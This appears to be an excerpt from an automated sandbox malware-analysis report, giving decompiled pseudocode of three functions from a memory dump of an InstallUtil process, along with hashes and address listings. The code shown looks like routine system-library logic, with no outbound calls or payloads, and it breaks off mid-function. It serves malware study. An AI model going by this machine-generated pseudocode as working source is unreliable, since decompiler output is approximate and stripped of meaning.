Instruction ID: fd5671f0dd99e35dc57df20630a0503f5fd36be3a482edef4672709d8fd8c7fd
Opcode Fuzzy Hash: 67b6423d918636b8d9e50b92f19aabce898b605562288fb1fffbba2e4d1872fb
Instruction Fuzzy Hash: 4FF1F575618342DFE726CB2CC48076BBBE5ABC6328F04852DEB958B281D774D841CB86

Uniqueness

Uniqueness Score: -1.00%

Function 012D849B Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E012D849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x139f9c0);
				E0131D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x13b7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E012DCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E012E2280( *[fs:0x30], 0x13b8550);
						_t139 =  *0x13b7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E012FF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E012DFFB0(_t193, _t235, 0x13b8550);
								L5:
								return E0131D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E012C1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x13b7b9c; // 0x0
							_t235 = L012E4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x13b7b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E012FA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E012DFFB0(_t193, _t235, 0x13b8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L012E77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L012E77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x13b7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x13b7b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E013037C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x13b7b9c; // 0x0
									_t214 = L012E4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E013037F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x13b7b10 =  *0x13b7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x13b7b04 =  *0x13b7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L012E77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L012E77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x13b7b08 =  *0x13b7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E013057C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0130F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L012E77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E012FA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L012E77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E013096C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x012d849b
0x012d849b
0x012d849b
0x012d849b
0x012d849d
0x012d84a2
0x012d84a7
0x012d84b1
0x012d84d8
0x00000000
0x012d84b3
0x012d84c4
0x012d84c9
0x012d84cd
0x012d84cf
0x012d84cf
0x012d84d6
0x012d84e6
0x012d84e9
0x012d84ec
0x012d84ef
0x012d84f2
0x012d84f4
0x012d84fc
0x012d8501
0x012d8506
0x012d8509
0x012d86e0
0x012d86e5
0x012d86e8
0x012d86ed
0x012d86f0
0x012d86f2
0x01329afd
0x01329b02
0x012d84da
0x012d84df
0x012d84df
0x012d86fa
0x012d86fd
0x012d86fe
0x012d8701
0x012d8706
0x012d8709
0x012d870b
0x00000000
0x00000000
0x012d8711
0x012d8725
0x012d8727
0x012d872a
0x012d872c
0x01329af0
0x01329af5
0x012d8732
0x012d8732
0x012d8732
0x012d8735
0x012d8737
0x012d8515
0x012d8515
0x012d8518
0x012d851d
0x012d8523
0x012d8527
0x012d852b
0x012d8537
0x012d8539
0x012d853c
0x012d853e
0x012d868c
0x012d8691
0x012d8699
0x012d869b
0x012d8744
0x012d8748
0x012d86a1
0x012d86a1
0x012d86a1
0x012d86a4
0x012d86a8
0x01329bdf
0x01329bdf
0x012d86ae
0x012d86b0
0x00000000
0x012d86b6
0x00000000
0x01329be9
0x012d86b0
0x012d8544
0x012d854a
0x012d854d
0x012d8551
0x012d876e
0x012d8778
0x012d877b
0x012d8780
0x012d8557
0x012d8557
0x012d855d
0x012d855d
0x012d856b
0x012d856e
0x012d8570
0x012d8573
0x012d8576
0x012d8576
0x012d8579
0x012d857b
0x00000000
0x00000000
0x012d8581
0x012d85a0
0x012d85a2
0x012d85a5
0x012d85a7
0x01329b1b
0x01329b1b
0x012d862e
0x012d862e
0x012d8631
0x012d8631
0x012d8634
0x012d8636
0x012d8669
0x012d8669
0x012d866b
0x01329bbf
0x01329bc4
0x01329bc8
0x01329bce
0x01329bce
0x012d8671
0x012d8671
0x012d8674
0x012d8676
0x01329bae
0x01329bae
0x012d8676
0x012d867c
0x012d867e
0x012d8688
0x012d8688
0x00000000
0x012d867e
0x012d8638
0x012d8638
0x012d863b
0x012d863e
0x012d863f
0x012d8642
0x012d8645
0x012d8648
0x012d864d
0x01329b69
0x01329b6e
0x01329b7b
0x01329b81
0x01329b85
0x01329b89
0x01329ba7
0x01329b8b
0x01329b91
0x01329b9a
0x01329b9f
0x01329b9f
0x012d8788
0x012d878d
0x012d8763
0x012d8763
0x012d8766
0x00000000
0x012d8766
0x01329b70
0x00000000
0x01329b70
0x012d8656
0x012d865a
0x012d865c
0x012d8752
0x012d8756
0x00000000
0x00000000
0x012d875e
0x00000000
0x012d875e
0x012d8662
0x012d8662
0x012d8662
0x012d8666
0x00000000
0x012d8666
0x012d85b7
0x012d85b9
0x012d85bc
0x012d85bf
0x012d85cc
0x012d85d1
0x012d85d4
0x012d85db
0x012d85de
0x012d85e0
0x01329b5f
0x00000000
0x01329b5f
0x012d85e6
0x012d85ea
0x012d86c3
0x012d86c5
0x012d86c8
0x012d86ca
0x01329b16
0x00000000
0x01329b16
0x012d86d6
0x012d85f6
0x012d85f6
0x012d85f9
0x012d8602
0x012d8606
0x012d860a
0x012d860b
0x012d860e
0x012d8611
0x00000000
0x012d8611
0x012d85f3
0x00000000
0x012d85f3
0x012d8619
0x012d861e
0x012d861e
0x012d8621
0x012d8622
0x012d8623
0x012d8625
0x012d862c
0x00000000
0x012d873d
0x00000000
0x012d873d
0x012d8737
0x012d850f
0x012d8512
0x00000000
0x012d8512
0x00000000
0x012d84d6

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28e502f9845995428c1c0555ddebbfd9b3c4892e8609775785b568434cd7d803
Instruction ID: d8fdfce1048655501038db448aae60f674f27a2f5eff0e0187134c7135882321
Opcode Fuzzy Hash: 28e502f9845995428c1c0555ddebbfd9b3c4892e8609775785b568434cd7d803
Instruction Fuzzy Hash: 2CB16E74E2025ADFDB19DF99C984AADBBB9FF48308F10412DE605AB345D770A941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 012CC600 Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E012CC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x13bd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E012D6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0130B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x13b7b9c; // 0x0
					_t74 = L012E4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E01309650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L012E77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0130F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E013013C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L012E77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E01309650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x012cc608
0x012cc615
0x012cc625
0x012cc62d
0x012cc635
0x012cc640
0x012cc680
0x012cc687
0x012cc688
0x012cc689
0x012cc694
0x012cc694
0x012cc642
0x012cc64a
0x012cc697
0x01337a25
0x01337a2b
0x01337a2e
0x01337a30
0x01337bea
0x01337bea
0x00000000
0x01337bea
0x01337a36
0x01337a43
0x01337a48
0x01337a4c
0x01337a4e
0x00000000
0x00000000
0x01337a58
0x01337a5a
0x01337a5b
0x01337a5c
0x01337a5d
0x01337a63
0x01337a64
0x01337a6a
0x01337a6c
0x01337a6e
0x013379cb
0x013379cb
0x013379ce
0x013379d0
0x01337a98
0x01337a9b
0x01337a9b
0x01337a9e
0x01337aa1
0x01337bbe
0x01337bbe
0x01337bc0
0x01337be0
0x01337be0
0x01337a01
0x01337a01
0x01337a05
0x01337a07
0x01337a15
0x01337a15
0x01337a1a
0x00000000
0x01337a1a
0x01337bc2
0x01337bc6
0x01337bc9
0x01337bcd
0x01337bcf
0x013379e6
0x013379e6
0x013379eb
0x013379eb
0x013379ef
0x013379f1
0x00000000
0x00000000
0x013379f3
0x013379f5
0x013379ff
0x013379ff
0x00000000
0x013379ff
0x013379f7
0x013379fd
0x00000000
0x00000000
0x00000000
0x013379fd
0x01337bd5
0x01337bd8
0x00000000
0x00000000
0x01337ba9
0x01337bac
0x01337bb0
0x01337bb1
0x01337bb1
0x01337bb6
0x00000000
0x01337bb6
0x01337aa7
0x01337aaa
0x00000000
0x00000000
0x01337ab2
0x01337ab3
0x01337ab5
0x01337aec
0x01337aef
0x01337b25
0x01337b28
0x01337b62
0x01337b64
0x01337b8f
0x01337b92
0x01337b96
0x01337b98
0x00000000
0x00000000
0x01337b9e
0x01337b9f
0x01337ba3
0x00000000
0x01337ba3
0x01337b66
0x01337b68
0x01337ae2
0x01337ae2
0x00000000
0x01337ae2
0x01337b6e
0x01337b72
0x01337b75
0x01337b81
0x01337b85
0x01337b87
0x00000000
0x00000000
0x01337b31
0x01337b34
0x01337b3c
0x01337b45
0x01337b46
0x01337b4f
0x01337b51
0x01337b57
0x01337b59
0x01337b59
0x00000000
0x01337b59
0x01337b77
0x00000000
0x01337b77
0x01337b2a
0x00000000
0x01337b2a
0x01337af1
0x01337af3
0x00000000
0x00000000
0x01337afb
0x01337afc
0x01337afe
0x00000000
0x00000000
0x01337b00
0x01337b03
0x00000000
0x00000000
0x01337b05
0x01337b09
0x01337b0d
0x01337b0f
0x00000000
0x00000000
0x01337b18
0x01337b1d
0x00000000
0x01337b1d
0x01337ab7
0x01337ab9
0x00000000
0x00000000
0x01337abf
0x01337ac1
0x00000000
0x00000000
0x01337ac3
0x01337ac6
0x00000000
0x00000000
0x01337ac8
0x01337acc
0x01337ad0
0x01337ad2
0x00000000
0x00000000
0x01337adb
0x00000000
0x01337adb
0x013379d6
0x013379d9
0x013379dc
0x01337a91
0x01337a94
0x00000000
0x01337a94
0x013379e2
0x00000000
0x013379e2
0x01337a74
0x01337a7a
0x00000000
0x00000000
0x01337a8a
0x01337a21
0x01337a21
0x00000000
0x01337a21
0x012cc650
0x012cc651
0x012cc656
0x012cc65c
0x012cc65d
0x012cc663
0x012cc664
0x012cc66a
0x012cc66e
0x013379c5
0x013379c7
0x00000000
0x013379c7
0x012cc67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 035c7657f6938f156c8c0b79cf67359e21756ae032bca983422995f01c4562d7
Instruction ID: c973a94c5d110b43e9634dc84aa5cbbb13da93cefdea955d088fb622cf5e88a9
Opcode Fuzzy Hash: 035c7657f6938f156c8c0b79cf67359e21756ae032bca983422995f01c4562d7
Instruction Fuzzy Hash: 9881B3B56142068FEB2ACE58C880F3A77E8EBC4358F14491EEE458B751D330DD41CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0135B8D0 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0135B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x13b7b9c; // 0x0
				_t124 = L012E4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E01309800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E013095B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E013095D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L012E77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E01309910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E013095D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x13b7b9c; // 0x0
									_t92 = L012E4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E01309910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E012CA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0135E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0135E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E013095B0();
